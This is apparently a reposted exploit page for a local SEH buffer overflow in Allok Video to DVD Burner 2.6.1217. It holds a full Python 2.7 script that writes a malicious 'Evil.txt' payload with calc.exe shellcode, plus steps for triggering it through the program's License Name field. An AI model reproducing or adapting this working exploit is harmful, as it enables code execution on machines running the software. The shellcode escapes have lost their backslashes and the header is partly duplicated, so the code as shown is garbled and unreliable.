Allok Video To DVD Burner 2.6.1217 Buffer Overflow

Details
Category: Vulnerabilities
Hits: 388
#######################################################
# Exploit Title: Buffer Overflow(SEH) on Allok Video to DVD Burner2.6.1217
# Date: 23.04.2018
# Exploit Author:T3jv1l
# Ven #######################################################
# Exploit Title: Buffer Overflow(SEH) on Allok Video to DVD Burner2.6.1217
# Date: 23.04.2018
# Exploit Author:T3jv1l
# Vendor Homepage:http://www.alloksoft.com/
# Software: www.alloksoft.com/allok_dvdburner.exe
# Category:Local
# Contact:https://twitter.com/T3jv1l
# Version: Allok Video to DVD Burner 2.6.1217
# Tested on: Windows 7 SP1 x86
# Hello subinacls !
# Method Corelan Coder : https://www.corelan.be/index.php/2009/07/28/seh-based-exploit-writing-tutorial-continued-just-another-example-part-3b/
#############################################################

print"""
#1. Download and install the setup file
#2. Run this exploit code via python 2.7
#3. A file "Evil.txt" will be created
#4. Copy the contents of the file (Evil.txt)and paste in the License Name field
#5. Click Register and BOMM !!!! """

import struct

file = open("Evil.txt","wb")
buffer = 4000
junk = "A" * 780
nseh = "x90x90xebx10"
seh = struct.pack("<L",0x10019A09)
nop = "x90" * 20

# Shellcode Calc.exe

buf = ""
buf +="xbaxd5x31x08x38xdbxcbxd9x74x24xf4x5bx29xc9xb1"
buf +="x33x83xc3x04x31x53x0ex03x86x3fxeaxcdxd4xa8x63"
buf +="x2dx24x29x14xa7xc1x18x06xd3x82x09x96x97xc6xa1"
buf +="x5dxf5xf2x32x13xd2xf5xf3x9ex04x38x03x2fx89x96"
buf +="xc7x31x75xe4x1bx92x44x27x6exd3x81x55x81x81x5a"
buf +="x12x30x36xeex66x89x37x20xedxb1x4fx45x31x45xfa"
buf +="x44x61xf6x71x0ex99x7cxddxafx98x51x3dx93xd3xde"
buf +="xf6x67xe2x36xc7x88xd5x76x84xb6xdax7axd4xffxdc"
buf +="x64xa3x0bx1fx18xb4xcfx62xc6x31xd2xc4x8dxe2x36"
buf +="xf5x42x74xbcxf9x2fxf2x9ax1dxb1xd7x90x19x3axd6"
buf +="x76xa8x78xfdx52xf1xdbx9cxc3x5fx8dxa1x14x07x72"
buf +="x04x5exa5x67x3ex3dxa3x76xb2x3bx8ax79xccx43xbc"
buf +="x11xfdxc8x53x65x02x1bx10x99x48x06x30x32x15xd2"
buf +="x01x5fxa6x08x45x66x25xb9x35x9dx35xc8x30xd9xf1"
buf +="x20x48x72x94x46xffx73xbdx24x9exe7x5dx85x05x80"
buf +="xc4xd9"
exploit = junk + nseh + seh + nop + buf
fillers = buffer - len(exploit)
crush = exploit + "T" * fillers
print "[+] Crush Me"
file.write(crush)
file.close()